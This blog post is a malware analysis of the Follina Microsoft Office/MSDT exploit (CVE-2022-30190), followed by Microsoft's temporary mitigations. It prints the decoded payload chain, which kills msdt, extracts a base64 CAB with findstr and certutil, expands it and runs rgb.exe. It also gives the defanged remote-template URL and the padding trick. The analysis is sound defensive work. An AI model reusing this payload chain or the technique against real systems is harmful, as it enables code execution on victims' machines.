Follina – An Actively Exploited Microsoft Zero-Day

CVE-2022-30190 dubbed Follina is a zero-day, “zero-click” (if saved as .rft) remote code execution technique used through MSDT (Microsoft Diagnostics Tool) and Microsoft Office utilities – Microsoft Word.

What makes this attack unique and subtle is the fact that it does not exploit macros – as has become popular with older malicious word files – which trigger familiar warning signs to users.

This exploit had before now been secretly exploited by malicious threat actors across the globe including Chinese TA413 as reported by Proofpoint and only came to the knowledge of the public after @nao_sec made a tweet about a Microsoft word document he dropped in a box for analysis on any.run – you can obtain a sample of this file by following the link.

How does it work?

Simple yet powerful!

“The maldoc uses Word’s remote template feature to load or retrieve a malicious HTML file from a remote server which then uses the “ms-msdt” scheme to load and execute some PowerShell code”.

To best explain this we will be getting our hands dirty – you can follow along using your lab or sandbox environment for an in-depth understanding of how the attack works.

Let’s head straight to any.run and download a publicly available malicious doc file which exploits Follina.

Extract the .doc file for analysis – remember a .doc file is a combination of other file types – lots of XML files unzip 05-2022-0438.doc

In a normal analysis case, we would have gone to these files and analysed each till we find the malicious one, but for the sake of this lab we will jump right to the malicious file which is word/_rels/document.xml.rels – highlighted in the image above.

Let’s do a quick display of the content of this file. cat word/_rels/document.xml.rels

This is a bit hard to read through, so let’s copy to or open it in any of your favourite text editors, for formatting and good colour-coding. I’ll be using Sublime text editor.

In the highlighted portion of the xml file above we can see the Target attribute pointing to a malicious server that contains a malicious file with the name RDF842l.html An inquisitive noob might ask how did you know this link and file are malicious? Observing the links and one would notice that this threat actor has successfully crafted a “legitimate looking” domain https://www.xmlformats[.]com/office/word/2022/wordprocessingDrawing/RDF842l.html! to make it look like the link was pointing to actual domain while others such as http://schemas[.]openxmlformats.org/package/2006/relationships and http://schemas.openxmlformats[.]org/officeDocument/2006/relationships/webSettings were pointing to the subdomain. As of the time of creating this post this website is no longer online.

But from the previous research and analysis carried out by @nao_sec we can download this file from any.run in order to continue our analysis.

The HTML file contains JavaScript code. Let’s analyze what this code does.

The first thing one would observe is that the code has a lot of A’s which are commented out. Why is this, one would ask? Commented codes are not executed by the machine so this would seem to serve no purpose for the exploit to be successful! But as opposed to this, the commented part of the code is actually needed for the exploit to run successfully because there exists a hardcoded buffer size for an HTML processing function, any files with fewer than 4096 bytes would therefore not invoke the payload.

Next is the window.location.href attribute which contains a long list of both clear and obfuscated commands

Let’s break this down step by step.

Using a schema for**ms-msdt**, the native PCWDiagnostic package is invoked with the parameters IT_BrowseForFile which includes PowerShell syntax embedded within $().

The obfuscated data – Base64 encoded (the “==” at the tail is a quick indicator) – ran through two layers of Invoke-Expression. This decode to: $cmd = "c:\\windows\\system32\\cmd.exe"; Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe"; Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\\users\\public\\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

With the path to cmd.exe saved to the cmd variable – $cmd = "c:\\windows\\system32\\cmd.exe"; – the following steps are followed:

A hidden window is startedStart-Process $cmd -windowstyle hidden b. msdt.exe process is killed if running – this helps to evade suspicion. -ArgumentList "/c taskkill /f /im msdt.exe" c. Loop through files inside the 05-2022-0438.rar file, while searching for a Base64 string for an encoded CAB file.

Store this Base64 encoded CAB file as 1.t.

Decode the Base64 encoded CAB file to be saved as 1.c.

Expand the 1.c CAB file into the current directory, and finally execute rgb.exe.-ArgumentList "/c cd C:\\users\\public\\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

Mitigation

As of the time of putting this blog post together, no patch has been released. For this reason, we expect an increase in exploitation attempts by different malicious individuals and groups across the globe. While we await a patch, we advise the following temporary workarounds as stated by Microsoft:

  1. Disable the MSDT URL protocol: To do this follow the steps listed below;
    • Run Command prompt as Admin.
    • Back up the registry key by executing the command below – make sure you keep this safe for the nearest future: reg export HKEY_CLASSES_ROOT\\ms-msdt <filename>
    • Delete the registry key using the following command: reg delete HKEY_CLASSES_ROOT\\ms-msdt /f

Undo:

To undo this probably when a patch has been officially released run the following command with admin privilege in Command prompt.

reg import <filename>

Turn-on cloud-delivered protection and automatic sample submission – for customers using Microsoft Defender Antivirus.

Customers of Microsoft Defender for Endpoint should enable attack surface reduction rule “Block all Office applications from creating child processes” GUID: d4f940ab-401b-4efc-aadc-ad5f3c50688a . This blocks Office apps from creating child processes, which is a common behaviour amongst malware.

Setting up a working SEIM in an enterprise environment which gives clear visibility into endpoints, thereby detecting real-time exploitation of unknown vulnerabilities on any connected endpoint, hence preventing malicious code execution, can’t be overemphasized.

By Emmanuel Ajibolu

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to Top